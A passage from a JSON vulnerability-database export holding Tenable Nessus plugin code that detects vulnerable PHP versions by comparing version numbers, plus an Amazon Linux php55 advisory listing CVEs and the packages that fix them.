value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"securitycenter_installed.nbin\");\n script_require_keys(\"Host/SecurityCenter/Version\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nsc_ver = get_kb_item_or_exit(\"Host/SecurityCenter/Version\");\nif (! ereg(pattern:\"^(4\\.[6789]|5)\\.\", string:sc_ver)) audit(AUDIT_INST_VER_NOT_VULN, \"SecurityCenter\", sc_ver);\n\n# Establish running of local commands\nif ( islocalhost() )\n{\n if ( ! defined_func(\"pread\") ) audit(AUDIT_NOT_DETECT, \"pread\");\n info_t = INFO_LOCAL;\n}\nelse\n{\n sock_g = ssh_open_connection();\n if (! sock_g) audit(AUDIT_HOST_NOT, \"able to connect via the provided SSH credentials.\");\n info_t = INFO_SSH;\n}\n\nline = info_send_cmd(cmd:\"/opt/sc4/support/bin/php -v\");\nif (!line) line = info_send_cmd(cmd:\"/opt/sc/support/bin/php -v\");\nif (!line)\n{\n if(info_t == INFO_SSH) ssh_close_connection();\n audit(AUDIT_UNKNOWN_APP_VER, \"PHP (within SecurityCenter)\");\n}\n\nif(info_t == INFO_SSH) ssh_close_connection();\n\npattern = \"PHP ([0-9.]+) \";\nmatch = eregmatch(pattern:pattern, string:line);\nif (isnull(match))\n audit(AUDIT_UNKNOWN_APP_VER, \"PHP (within SecurityCenter)\");\n\nversion = match[1];\n\nif (version =~ \"^5\\.4\\.\") fix = \"5.4.41\";\nelse if (version =~ \"^5\\.5\\.\") fix = \"5.5.25\";\nelse if (version =~ \"^5\\.6\\.\") fix = \"5.6.9\";\nelse fix = \"5.4.41\"; # default to known php release branch used in advisory\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report = '\\n' +\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter PHP version : ' + version +\n '\\n Fixed PHP version : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"PHP (within SecurityCenter)\", version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:47:31", "references": ["http://php.net/ChangeLog-5.php#5.6.9"], "pluginID": "83519", "description": "According to its banner, the version of PHP 5.6.x running on the remote web server is prior to 5.6.9. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple flaws exist related to using pathnames containing NULL bytes. A remote attacker can exploit these flaws, by combining the '\\0' character with a safe file extension, to bypass access restrictions. This had been previously fixed but was reintroduced by a regression in versions 5.4+. (CVE-2006-7243, CVE-2015-4025)\n\n - An integer overflow condition exists in the ftp_genlist() function in ftp.c due to improper validation of user-supplied input. A remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or possible remote code execution. (CVE-2015-4022)\n\n - A flaw exists in the multipart_buffer_headers() function in rfc1867.c due to improper handling of multipart/form-data in HTTP requests. A remote attacker can exploit this flaw to cause a consumption of CPU resources, resulting in a denial of service condition.\n (CVE-2015-4024)\n\n - A security bypass vulnerability exists due to a flaw in the pcntl_exec implementation that truncates a pathname upon encountering the '\\x00' character. A remote attacker can exploit this, via a crafted first argument, to bypass intended extension restrictions and execute arbitrary files. (CVE-2015-4026)\n\n - A NULL pointer dereference flaw exists in the xsl_ext_function_php() function in xsltprocessor.c due to improper validation of user-supplied input. A remote attacker can exploit this to cause a denial of service condition. (VulnDB 126989)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2015-05-18T00:00:00", "title": "PHP 5.6.x < 5.6.9 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_9.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83519);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-7243\",\n \"CVE-2015-4022\",\n \"CVE-2015-4024\",\n \"CVE-2015-4025\",\n \"CVE-2015-4026\"\n );\n script_bugtraq_id(\n 44951,\n 74902,\n 74903,\n 74904,\n 75056\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.9 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x running on the\nremote web server is prior to 5.6.9. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple flaws exist related to using pathnames\n containing NULL bytes. A remote attacker can exploit\n these flaws, by combining the '\\0' character with a safe\n file extension, to bypass access restrictions. This had\n been previously fixed but was reintroduced by a\n regression in versions 5.4+. (CVE-2006-7243,\n CVE-2015-4025)\n\n - An integer overflow condition exists in the\n ftp_genlist() function in ftp.c due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to cause a heap-based buffer overflow,\n resulting in a denial of service condition or possible\n remote code execution. (CVE-2015-4022)\n\n - A flaw exists in the multipart_buffer_headers() function\n in rfc1867.c due to improper handling of\n multipart/form-data in HTTP requests. A remote attacker\n can exploit this flaw to cause a consumption of CPU\n resources, resulting in a denial of service condition.\n (CVE-2015-4024)\n\n - A security bypass vulnerability exists due to a flaw in\n the pcntl_exec implementation that truncates a pathname\n upon encountering the '\\x00' character. A remote\n attacker can exploit this, via a crafted first argument,\n to bypass intended extension restrictions and execute\n arbitrary files. (CVE-2015-4026)\n\n - A NULL pointer dereference flaw exists in the\n xsl_ext_function_php() function in xsltprocessor.c due\n to improper validation of user-supplied input. A remote\n attacker can exploit this to cause a denial of service\n condition. (VulnDB 126989)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.9\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-8]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.9' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:28", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-ldap-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-cli-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-mcrypt-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-soap-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-pdo-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-fpm-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-opcache-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-devel-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-enchant-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-embedded-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-xmlrpc-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-opcache-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-opcache", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-process-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-mysqlnd-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-common-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-process-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-process", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-mbstring-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-xml-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-bcmath-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-fpm-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-fpm", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-tidy-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-soap-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-soap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-mssql-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-gmp-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-common-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-common", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-mssql-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-mssql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-pspell-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "src", "packageFilename": "php55-5.5.25-1.101.amzn1.src.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-imap-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-mcrypt-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-mcrypt", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-debuginfo-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-intl-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-snmp-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-xml-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-xml", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-mysqlnd-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-mysqlnd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-debuginfo-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-bcmath-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-bcmath", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-xmlrpc-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-xmlrpc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-gmp-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-gmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-intl-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-intl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-gd-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-gd", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-embedded-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-embedded", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-snmp-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-snmp", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-recode-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-dba-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-odbc-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-ldap-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-ldap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-tidy-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-tidy", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-dba-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-dba", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-pspell-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-pspell", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-mbstring-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-mbstring", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-pgsql-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-pdo-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-pdo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-recode-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-recode", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-imap-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-imap", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-pgsql-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-pgsql", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-enchant-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-enchant", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-odbc-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-odbc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-devel-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "i686", "packageFilename": "php55-cli-5.5.25-1.101.amzn1.i686.rpm", "packageName": "php55-cli", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "5.5.25-1.101.amzn1", "arch": "x86_64", "packageFilename": "php55-gd-5.5.25-1.101.amzn1.x86_64.rpm", "packageName": "php55-gd", "operator": "lt"}], "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 __](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-xml-5.5.25-1.101.amzn1.i686 \n php55-soap-5.5.25-1.101.amzn1.i686 \n php55-dba-5.5.25-1.101.amzn1.i686 \n php55-imap-5.5.25-1.101.amzn1.i686 \n php55-pspell-5.5.25-1.101.amzn1.i686 \n php55-gd-5.5.25-1.101.amzn1.i686 \n php55-intl-5.5.25-1.101.amzn1.i686 \n php55-opcache-5.5.25-1.101.amzn1.i686 \n php55-tidy-5.5.25-1.101.amzn1.i686 \n php55-fpm-5.5.25-1.101.amzn1.i686 \n php55-mssql-5.5.25-1.101.amzn1.i686 \n php55-enchant-5.5.25-1.101.amzn1.i686 \n php55-mysqlnd-5.5.25-1.101.amzn1.i686 \n php55-cli-5.5.25-1.101.amzn1.i686 \n php55-pdo-5.5.25-1.101.amzn1.i686 \n php55-5.5.25-1.101.amzn1.i686 \n php55-devel-5.5.25-1.101.amzn1.i686 \n php55-snmp-5.5.25-1.101.amzn1.i686 \n php55-xmlrpc-5.5.25-1.101.amzn1.i686 \n php55-mcrypt-5.5.25-1.101.amzn1.i686 \n php55-recode-5.5.25-1.101.amzn1.i686 \n php55-common-5.5.25-1.101.amzn1.i686 \n php55-bcmath-5.5.25-1.101.amzn1.i686 \n php55-debuginfo-5.5.25-1.101.amzn1.i686 \n php55-embedded-5.5.25-1.101.amzn1.i686 \n php55-odbc-5.5.25-1.101.amzn1.i686 \n php55-mbstring-5.5.25-1.101.amzn1.i686 \n php55-ldap-5.5.25-1.101.amzn1.i686 \n php55-pgsql-5.5.25-1.101.amzn1.i686 \n php55-gmp-5.5.25-1.101.amzn1.i686 \n php55-process-5.5.25-1.101.amzn1.i686 \n \n src: \n php55-5.5.25-1.101.amzn1.src \n \n x86_64: \n php55-mbstring-5.5.25-1.101.amzn1.x86_64 \n php55-5.5.25-1.101.amzn1.x86_64 \n php55-xmlrpc-5.5.25-1.101.amzn1.x86_64 \n php55-cli-5.5.25-1.101.amzn1.x86_64 \n php55-recode-5.5.25-1.101.amzn1.x86_64 \n php55-devel-5.5.25-1.101.amzn1.x86_64 \n php55-gmp-5.5.25-1.101.amzn1.x86_64 \n php55-enchant-5.5.25-1.101.amzn1.x86_64 \n php55-process-5.5.25-1.101.amzn1.x86_64 \n php55-pgsql-5.5.25-1.101.amzn1.x86_64 \n php55-debuginfo-5.5.25-1.101.amzn1.x86_64 \n php55-gd-5.5.25-1.101.amzn1.x86_64 \n php55-soap-5.5.25-1.101.amzn1.x86_64 \n php55-intl-5.5.25-1.101.amzn1.x86_64 \n php55-ldap-5.5.25-1.101.amzn1.x86_64 \n php55-odbc-5.5.25-1.101.amzn1.x86_64 \n php55-xml-5.5.25-1.101.amzn1.x86_64 \n php55-pspell-5.5.25-1.101.amzn1.x86_64 \n php55-opcache-5.5.25-1.101.amzn1.x86_64 \n php55-dba-5.5.25-1.101.amzn1.x86_64 \n php55-embedded-5.5.25-1.101.amzn1.x86_64 \n php55-tidy-5.5.25-1.101.amzn1.x86_64 \n php55-mssql-5.5.25-1.101.amzn1.x86_64 \n php55-snmp-5.5.25-1.101.amzn1.x86_64 \n php55-common-5.5.25-1.101.amzn1.x86_64 \n php55-imap-5.5.25-1.101.amzn1.x86_64 \n php55-fpm-5.5.25-1.101.amzn1.x86_64 \n php55-mysqlnd-5.5.25-1.101.amzn1.x86_64 \n php55-pdo-5.5.25-1.101.amzn1.x86_64 \n php55-bcmath-5.5.25-1.101.amzn1.x86_64 \n php55-mcrypt-5.5.25-1.101.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2015-06-02T22:33:00", "title": "Medium: php55", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:28", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-06-02T22:33:00", "id": "ALAS-2015-535", "href": "https://alas.aws.amazon.com/ALAS-2015-535.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:15", "references": [], "affectedPackage": [{"OS": "Amazon Linux", 